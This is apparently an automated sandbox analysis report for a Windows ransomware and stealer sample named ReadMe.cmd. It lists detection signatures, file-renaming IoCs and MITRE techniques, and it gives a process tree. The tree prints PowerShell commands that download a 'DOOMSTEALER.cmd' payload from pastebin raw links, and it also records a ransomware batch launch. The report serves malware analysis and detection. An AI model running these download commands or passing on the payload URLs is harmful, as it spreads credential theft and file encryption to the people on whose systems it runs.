d01226b2f65505ea6fd98deaa92f3d48e50457e0264e4c636b71d53001eee048

Analysis

max time kernel
67s
max time network
70s
platform
windows10-2004_x64
resource
win10v2004-20220721-en
resource tags

arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
submitted
25-07-2022 01:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ReadMe.cmd
Size

18KB
MD5

9604df2bffd72ef6202287cf4f00ba9e
SHA1

a4e5f57b19e3afe88843dd1a41cdd1eee82f0fee
SHA256

d01226b2f65505ea6fd98deaa92f3d48e50457e0264e4c636b71d53001eee048
SHA512

d5c09ed8fac89aafb2f7b28732c802c88ac005437213633a671d79c0250ec662e46c96ed1b13312546d775b10e9885a16222cd8e379b516b5b2c4496e653ef58

Score

10^/10

persistence ransomware spyware stealer suricata

Malware Config

Signatures

suricata: ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND
suricata: ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND
suricata
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.execmd.exe

flow pid process

2 1636 powershell.exe
7 4168 powershell.exe
73 6848 cmd.exe

flow	pid	process
2	1636	powershell.exe
7	4168	powershell.exe
73	6848	cmd.exe

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

cmd.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\EnterInvoke.tif => C:\Users\Admin\Pictures\EnterInvoke.tif2149323512.DCRYPT	cmd.exe
File renamed	C:\Users\Admin\Pictures\ExpandUnprotect.png => C:\Users\Admin\Pictures\ExpandUnprotect.png2149323512.DCRYPT	cmd.exe
File renamed	C:\Users\Admin\Pictures\RemoveLock.png => C:\Users\Admin\Pictures\RemoveLock.png2149323512.DCRYPT	cmd.exe
File renamed	C:\Users\Admin\Pictures\ApproveExpand.crw => C:\Users\Admin\Pictures\ApproveExpand.crw2149323512.DCRYPT	cmd.exe
File renamed	C:\Users\Admin\Pictures\ClearUse.tiff => C:\Users\Admin\Pictures\ClearUse.tiff2149323512.DCRYPT	cmd.exe
File renamed	C:\Users\Admin\Pictures\SplitComplete.png => C:\Users\Admin\Pictures\SplitComplete.png2149323512.DCRYPT	cmd.exe
File renamed	C:\Users\Admin\Pictures\UninstallOptimize.tiff => C:\Users\Admin\Pictures\UninstallOptimize.tiff2149323512.DCRYPT	cmd.exe
File opened for modification	C:\Users\Admin\Pictures\ClearUse.tiff	cmd.exe
File opened for modification	C:\Users\Admin\Pictures\UninstallOptimize.tiff	cmd.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation cmd.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation	cmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\4928211d-3d2f-4000-9ea0-81ea60a217b1.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220725010106.pma	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 41 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
6516	timeout.exe
4044	timeout.exe
6336	timeout.exe
6356	timeout.exe
1560	timeout.exe
6420	timeout.exe
7092	timeout.exe
7144	timeout.exe
6652	timeout.exe
7000	timeout.exe
3676	timeout.exe
6204	timeout.exe
5476	timeout.exe
6772	timeout.exe
1036	timeout.exe
6280	timeout.exe
6256	timeout.exe
5944	timeout.exe
5960	timeout.exe
2488	timeout.exe
3672	timeout.exe
6932	timeout.exe
5092	timeout.exe
5388	timeout.exe
1760	timeout.exe
2100	timeout.exe
6580	timeout.exe
4852	timeout.exe
5224	timeout.exe
6832	timeout.exe
6792	timeout.exe
6920	timeout.exe
6488	timeout.exe
2840	timeout.exe
6316	timeout.exe
2100	timeout.exe
7016	timeout.exe
6244	timeout.exe
6320	timeout.exe
6352	timeout.exe
6788	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

6804 tasklist.exe

pid	process
6804	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

6232 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

6308 systeminfo.exe

pid	process
6232	ipconfig.exe

pid	process
6308	systeminfo.exe

Modifies registry class 10 IoCs

Processes:

calc.execalc.execalc.execalc.execalc.execalc.exemsedge.execmd.execalc.execalc.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings	calc.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exemsedge.exemsedge.exeidentity_helper.exe

pid	process
1636	powershell.exe
1636	powershell.exe
1636	powershell.exe
4168	powershell.exe
4168	powershell.exe
4168	powershell.exe
2080	msedge.exe
2080	msedge.exe
1764	msedge.exe
1764	msedge.exe
1636	powershell.exe
1636	powershell.exe
1636	powershell.exe
6560	identity_helper.exe
6560	identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

1764 msedge.exe
1764 msedge.exe
1764 msedge.exe
1764 msedge.exe
1764 msedge.exe
1764 msedge.exe

pid	process
1764	msedge.exe
1764	msedge.exe
1764	msedge.exe
1764	msedge.exe
1764	msedge.exe
1764	msedge.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

Processes:

powershell.exepowershell.exetasklist.exeAUDIODG.EXE

description	pid	process
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	4168	powershell.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeIncreaseQuotaPrivilege	1636	powershell.exe
Token: SeSecurityPrivilege	1636	powershell.exe
Token: SeTakeOwnershipPrivilege	1636	powershell.exe
Token: SeLoadDriverPrivilege	1636	powershell.exe
Token: SeSystemProfilePrivilege	1636	powershell.exe
Token: SeSystemtimePrivilege	1636	powershell.exe
Token: SeProfSingleProcessPrivilege	1636	powershell.exe
Token: SeIncBasePriorityPrivilege	1636	powershell.exe
Token: SeCreatePagefilePrivilege	1636	powershell.exe
Token: SeBackupPrivilege	1636	powershell.exe
Token: SeRestorePrivilege	1636	powershell.exe
Token: SeShutdownPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeSystemEnvironmentPrivilege	1636	powershell.exe
Token: SeRemoteShutdownPrivilege	1636	powershell.exe
Token: SeUndockPrivilege	1636	powershell.exe
Token: SeManageVolumePrivilege	1636	powershell.exe
Token: 33	1636	powershell.exe
Token: 34	1636	powershell.exe
Token: 35	1636	powershell.exe
Token: 36	1636	powershell.exe
Token: SeDebugPrivilege	6804	tasklist.exe
Token: 33	3540	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3540	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

msedge.exeWScript.exe

pid process

1764 msedge.exe
1764 msedge.exe
1764 msedge.exe
6056 WScript.exe
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exetimeout.exeOpenWith.exeOpenWith.exe

pid process

5080 OpenWith.exe
1088 OpenWith.exe
628 OpenWith.exe
4092 OpenWith.exe
2480 OpenWith.exe
3676 timeout.exe
4368 OpenWith.exe
5092 OpenWith.exe

pid	process
1764	msedge.exe
1764	msedge.exe
1764	msedge.exe
6056	WScript.exe

pid	process
5080	OpenWith.exe
1088	OpenWith.exe
628	OpenWith.exe
4092	OpenWith.exe
2480	OpenWith.exe
3676	timeout.exe
4368	OpenWith.exe
5092	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exemsedge.execmd.execmd.exe

description	pid	process	target process
PID 1964 wrote to memory of 2736	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 2736	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 884	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 884	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 1584	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 1584	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 1516	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 1516	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4412	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4412	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4492	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4492	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 2384	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 2384	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4036	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4036	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4796	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4796	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4720	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4720	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 1940	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 1940	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 316	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 316	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 2120	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 2120	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 5064	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 5064	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 5000	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 5000	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4836	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4836	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4540	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 4540	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 2788	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 2788	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 4292	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 4292	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 4952	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 4952	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 1216	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 1216	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 624	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 624	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 4576	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 4576	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 3684	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 3684	1964	cmd.exe	calc.exe
PID 1964 wrote to memory of 1636	1964	cmd.exe	powershell.exe
PID 1964 wrote to memory of 1636	1964	cmd.exe	powershell.exe
PID 1964 wrote to memory of 4168	1964	cmd.exe	powershell.exe
PID 1964 wrote to memory of 4168	1964	cmd.exe	powershell.exe
PID 1964 wrote to memory of 1764	1964	cmd.exe	msedge.exe
PID 1964 wrote to memory of 1764	1964	cmd.exe	msedge.exe
PID 1964 wrote to memory of 4980	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4980	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4644	1964	cmd.exe	cmd.exe
PID 1964 wrote to memory of 4644	1964	cmd.exe	cmd.exe
PID 1764 wrote to memory of 1464	1764	msedge.exe	msedge.exe
PID 1764 wrote to memory of 1464	1764	msedge.exe	msedge.exe
PID 4644 wrote to memory of 1348	4644	cmd.exe	curl.exe
PID 4644 wrote to memory of 1348	4644	cmd.exe	curl.exe
PID 4980 wrote to memory of 2840	4980	cmd.exe	timeout.exe
PID 4980 wrote to memory of 2840	4980	cmd.exe	timeout.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ReadMe.cmd"
1⤵
- Modifies extensions of user files
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:2736

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:884

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1584

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1516

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:4412

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:4492

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:2384

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:4036

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:4796

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:4720

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:1940

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:316

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:2120

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:5064

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:5000

C:\Windows\system32\cmd.exe
cmd.exe
2⤵
PID:4836

C:\Windows\system32\calc.exe
calc.exe
2⤵
- Modifies registry class
PID:4540

C:\Windows\system32\calc.exe
calc.exe
2⤵
- Modifies registry class
PID:2788

C:\Windows\system32\calc.exe
calc.exe
2⤵
- Modifies registry class
PID:4292

C:\Windows\system32\calc.exe
calc.exe
2⤵
- Modifies registry class
PID:4952

C:\Windows\system32\calc.exe
calc.exe
2⤵
- Modifies registry class
PID:1216

C:\Windows\system32\calc.exe
calc.exe
2⤵
- Modifies registry class
PID:624

C:\Windows\system32\calc.exe
calc.exe
2⤵
- Modifies registry class
PID:4576

C:\Windows\system32\calc.exe
calc.exe
2⤵
- Modifies registry class
PID:3684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "Invoke-WebRequest https://pastebin.com/raw/n1rhF7sd -outfile DOOMSTEALER.cmd"
2⤵
PID:1636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "Invoke-WebRequest https://pastebin.com/raw/ejSv3eLM -outfile Distractions.html"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Distractions.html
2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdf92a46f8,0x7ffdf92a4708,0x7ffdf92a4718
3⤵
PID:1464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
3⤵
PID:4904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:8
3⤵
PID:4348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
3⤵
PID:2212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3844 /prefetch:1
3⤵
PID:5012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4796 /prefetch:8
3⤵
PID:2152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5380 /prefetch:8
3⤵
PID:5404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
3⤵
PID:5772

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1
3⤵
PID:5800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
3⤵
PID:5472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
3⤵
PID:6136

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:8
3⤵
PID:6372

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:6436

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1bc,0x22c,0x7ff73a8e5460,0x7ff73a8e5470,0x7ff73a8e5480
4⤵
PID:6620

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6220 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:6560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2128,11874063451590823645,12874248732157077815,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6584 /prefetch:8
3⤵
PID:1388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K DOOMCRYPTGUI.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:4980

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:2840

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:1760

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:1560

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:5944

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:5960

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:5476

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
- Suspicious use of SetWindowsHookEx
PID:3676

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:2100

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:2488

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:5224

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:3672

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6204

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6316

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6352

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6420

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6516

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6652

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6772

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6788

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6832

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6932

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:7000

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:7092

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:7144

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:2100

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:4044

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:5092

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6336

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6580

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6792

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:6920

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:7016

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:4852

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:1036

